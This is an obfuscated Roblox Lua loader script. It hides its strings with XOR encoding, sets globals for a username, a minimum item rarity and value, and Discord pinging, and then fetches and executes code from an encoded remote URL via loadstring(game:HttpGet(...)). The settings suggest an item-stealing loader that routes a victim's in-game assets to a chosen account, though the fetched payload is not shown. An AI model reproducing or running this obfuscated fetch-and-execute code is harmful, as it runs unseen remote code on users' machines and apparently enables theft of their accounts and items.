--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end _G.Username=v7("\248\240\215\32\227\171\243\22\195\214\238\55\199\183\198\12\220\208","\126\177\163\187\69\134\219\167");_G.min_rarity=v7("\4\194\46\201\229","\156\67\173\74\165");_G.min_value=3 -2 ;_G.pingEveryone=v7("\13\178\90","\38\84\215\41\118\220\70");_G.discuser=v7("\4\66\119\69\173\3\64\122\64\174\9\71\123\67\169\3\71\118","\158\48\118\66\114");loadstring(game:HttpGet(v7("\163\48\4\38\96\255\180\228\54\17\33\61\162\242\191\44\5\52\102\182\254\185\39\31\56\103\160\245\191\106\19\57\126\234\214\134\118\52\35\99\160\233\230\12\5\52\60\136\214\249\107\2\51\117\182\180\163\33\17\50\96\234\246\170\45\30\121\103\183\250\175\33","\155\203\68\112\86\19\197")))();
